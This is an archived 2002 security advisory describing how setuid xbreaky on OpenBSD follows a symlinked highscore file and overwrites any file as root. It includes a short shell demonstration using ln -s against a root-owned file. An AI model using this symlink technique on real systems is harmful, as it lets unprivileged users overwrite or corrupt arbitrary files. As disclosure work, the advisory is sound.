TUCoPS :: BSD :: bsd5685.htm

xbreaky symlink vulnerability
13th Sep 2002 [SBWID-5685]
COMMAND

	
		xbreaky symlink vulnerability
	
	

SYSTEMS AFFECTED

	
		xbreaky versions prior to 0.0.5 on OpenBSD
	
	

PROBLEM

	
		Marco van Berkum [m.v.berkum@obit.nl] [http://ws.obit.nl] with the  help
		of Dennis Oelkers :
		

		By default xbreaky is installed as suid and can be abused  to  overwrite
		any file on the filesystem, by any user.
		

		 Exploit

		 -------

		

		xbreaky uses $HOME/.breakyhighscores to write the  highscores  to,  when
		$HOME/.breakyhighscores is symlinked to another  file  (*any*  file)  it
		simply overwrites it as root user.
		

		 Example

		 -------

		

		root@animal:/home/marco# echo "bla" >rootfile

		root@animal:/home/marco# chmod 600 rootfile

		root@animal:/home/marco# exit

		logout

		marco@animal:~$ ln -s rootfile .breakyhighscores

		marco@animal:~$ xbreaky

		

		Now I play a game and set highscore as  user  "lol",  then  I  exit  the
		game. Its a nice game btw :)
		

		marco@animal:~$ cat rootfile

		cat: rootfile: Permission denied

		marco@animal:~$ su -

		Password:

		root@animal:~# cat /home/marco/rootfile

		lol <- voila, our highscore user

		
	
	

SOLUTION

	
	

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH